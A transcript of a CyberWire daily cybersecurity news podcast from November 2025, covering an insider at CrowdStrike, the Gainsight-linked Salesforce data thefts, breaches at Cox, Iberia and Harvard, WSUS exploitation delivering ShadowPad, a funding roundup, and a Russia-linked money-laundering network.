Inside job interrupted.

CrowdStrike fires an insider who allegedly shared screenshots with hackers. Google agrees, it wasn’t Salesforce. Cox Enterprises confirms Oracle EBS breach. Alleged Transport for London hackers plead not guilty. Hackers exploit new WSUS bug to deploy ShadowPad backdoor. Iberia discloses breach of customer data. Harvard discloses voice-phishing breach exposing alumni and donor data. We have our Monday Business Briefing. Our guest today is Brandon Karpf, friend of the show discussing maritime GPS jamming and spoofing. And the launderers who wanted a bank for Christmas.

Today is Monday, November 24th, 2025. I’m Maria Varmazis, host of T-Minus Space Daily, in for Dave Bittner as he’s defrosting his turkey. And this is your CyberWire Intel Briefing.

CrowdStrike fires insider who allegedly shared screenshots with hackers.

CrowdStrike has fired an insider who allegedly shared screenshots of internal systems with hackers, TechCrunch reports. The Scattered Lapsus$ Hunters published the screenshots in a Telegram channel last week, claiming to have gained access to CrowdStrike's systems after breaching Gainsight. CrowdStrike says these claims are false, stating that its "systems were never compromised and customers remained protected throughout." The company says the hackers obtained the screenshots from a malicious insider, whose access has been terminated.

BleepingComputer cites a ShinyHunters member who said the group offered the insider $25,000 to grant access to CrowdStrike's networks, but the insider was detected and locked out before they could do so. These details haven't been confirmed by CrowdStrike.

Google agrees, it wasn’t Salesforce.

In related news, Google’s Threat Intelligence Group reports hackers accessed and stole data from over 200 customer instances of Salesforce via third-party apps published by Gainsight. The campaign, claimed by the Scattered Lapsus$ Hunters collective (including ShinyHunters), exploited integrations—not the core Salesforce platform—to infiltrate high-profile targets such as Dentoursign, LinkedIn and Verizon. Salesforce says the breach “is not the result of any vulnerability in the Salesforce platform.” 

Cox Enterprises confirms Oracle EBS breach.

US-based global conglomerate Cox Enterprises has confirmed that its Oracle E-Business Suite (EBS) instance was breached, leading to theft of personal information belonging to nearly 9,500 individuals, SecurityWeek reports. Cox was one of more than 100 entities named by the Clop ransomware gang as victims of a campaign targeting a zero-day flaw in Oracle EBS. Logitech, Harvard University, the Washington Post, Envoy Air, and Mazda have also confirmed they were targeted by the campaign. Mazda told SecurityWeek, however, that its defenses prevented the attackers from exfiltrating information.

Alleged Transport for London hackers plead not guilty.

Two alleged Scattered Spider hackers have pleaded not guilty to charges related to last year's cyberattack against Transport for London, the BBC reports. The defendants, nineteen-year-old Thalha Jubair from East London and eighteen-year-old Owen Flowers from the West Midlands, were arrested last year and charged with offenses under the Computer Misuse Act. Flowers has also been charged with attempting to hack two US-based healthcare entities. The two defendants will be held in custody until their trial in June 2026.

Hackers exploit new WSUS bug to deploy ShadowPad backdoor.

Attackers have exploited a recently patched vulnerability in Windows Server Update Services (WSUS) — CVE-2025-59287, rated CVSS 9.8 — enabling unauthenticated remote code execution at the SYSTEM level. Once inside WSUS-enabled servers, the adversary deployed the sophisticated backdoor ShadowPad by chaining tools like PowerCat, certutil and curl to download and sideload a malicious DLL, which then persists via scheduled tasks and system-process injection. 

CISA has added the flaw to its Known Exploited Vulnerabilities catalog, and organizations using WSUS are urged to patch immediately, restrict access and audit for abnormal activity.

Iberia discloses breach of customer data.

Spanish airline Iberia has disclosed a breach affecting customers' names, email addresses, and loyalty card identification numbers, BleepingComputer reports. The incident did not affect login credentials or financial details. The airline has attributed the breach to a third-party vendor, saying in a statement, "As soon as we became aware of the incident, we activated our security protocol and procedures and implemented all necessary technical and organizational measures to contain it, mitigate its effects, and prevent its recurrence."

BleepingComputer notes that a threat actor posted on a criminal forum claiming to have stolen data from Iberia and offering to sell it for $150,000. It's unclear if these claims are related, however, since the threat actor claimed to have breached Iberia's own servers and stolen technical details related to aircraft.

Harvard discloses voice-phishing breach exposing alumni and donor data.

Harvard University has disclosed that its Alumni Affairs & Development systems were compromised following a voice-phishing attack on November 18, 2025, which allowed an unauthorized party to access data related to alumni, donors, students, faculty and staff. The exposed information includes email addresses, phone numbers, home and business addresses, donation and event-attendance records — but notably not Social Security numbers, payment card data or financial account credentials. The university is working with law-enforcement and third-party cybersecurity experts and has begun notifying affected individuals.

Business Briefing. 

Last week’s Business Breakdown highlights just over $180 million raised across 7 investments and 3 acquisitions. 

On the investment front, US-based social engineering defense company, Doppel, raised $70 million in a Series C round. With this new funding, Doppel aims to expand its Digital Risk Protection product portfolio, alongside expanding its existing Human Risk Management offerings.

Additionally, Bedrock Data, a US-based data security firm, raised $25 million in a Series A round. Through this funding, the company aims to accelerate product development timelines and invest in scaling its data security, integrations, classification, and AI governance. Additionally, the company also aims to meet its growing enterprise demand for IaaS, PaaS, SaaS, and AI systems at the multi-petabyte scale.

For acquisitions, Cloudflare announced its intention to acquire Replicate, a US-based AI model development company. Through Replicate, Cloudflare is looking to expand its Cloudflare Workers offering to allow it to build scalable and reliable AI applications. Additionally, Cloudflare aims to enable developers to access AI models across the globe with minimal code.

And that wraps up this week’s Business Breakdown. For deeper analysis on major business moves shaping the cybersecurity landscape, subscribe to N2K Pro and check out TheCyberWire.com every Wednesday for the latest updates.

Stick around after the break, Dave Bittner and I recently sat down with Brandon Karpf, friend of the show as we discussed maritime GPS jamming and spoofing. And the launderers who wanted a bank for Christmas.

Dave Bittner and I recently sat down with  Brandon Karpf, friend of the show as they discussed maritime GPS jamming and spoofing. Here’s our conversation.

That was Brandon Karpf, friend of the show discussing maritime GPS jamming and spoofing.

The launderers who wanted a bank for Christmas.

On Christmas Day 2024, a Russia-linked crime network gifted itself something far more festive: a 75 percent stake in a Kyrgyzstani bank. The UK’s National Crime Agency says that “Merry Bank-mas” purchase became a convenient machine for washing cybercrime profits and channeling money into Moscow’s war chest. Operation Destabilise found the scheme began with low-paid couriers roaming 28 UK towns, collecting envelopes of cash from drug, firearms, and immigration crimes. That cash was flipped into crypto and funneled through Keremet Bank—the one they bought—to support Promsvyazbank, Russia’s military lender. At the top were two laundering crews: Smart, allegedly led by Ekaterina Zhdanova, and TGR, headed by George Rossi. Each leader worked alongside two partners, and all six are now sanctioned by the US Treasury. The network also crossed paths with figures linked to Russian intelligence, including a group led by convicted spy Orlin Roussev, and drew in Russian-Moldovan oligarch Ilan Shor and his sanctions-dodging crypto ventures. Couriers have already been jailed, including one caught with £750,000 at home and another pair who laundered £6 million under the guise of “war-related transfers.” With more than 120 arrests and millions seized, the NCA says its crackdown is tightening the pressure. And the money launderers? They know it.

And that’s the CyberWire.

For links to all of today’s stories, check out our Daily Briefing at the cyberwire dot com.

We’d love to know what you think of this podcast. Your feedback ensures we deliver the insights that keep you a step ahead in the rapidly changing world of cybersecurity. If you like the show, please share a rating and review in your podcast app. Please also fill out the survey in the show notes or send an email to cyberwire@n2k.com

 

N2K’s senior producer is Alice Carruth. Our producer is Liz Stokes. We’re mixed by Elliott Peltzman and Tré Hester, with original music by Elliott Peltzman. Our executive producer is Jennifer Eiben. Peter Kilpe is our publisher, and I’m Maria Varmazis. Thanks for listening.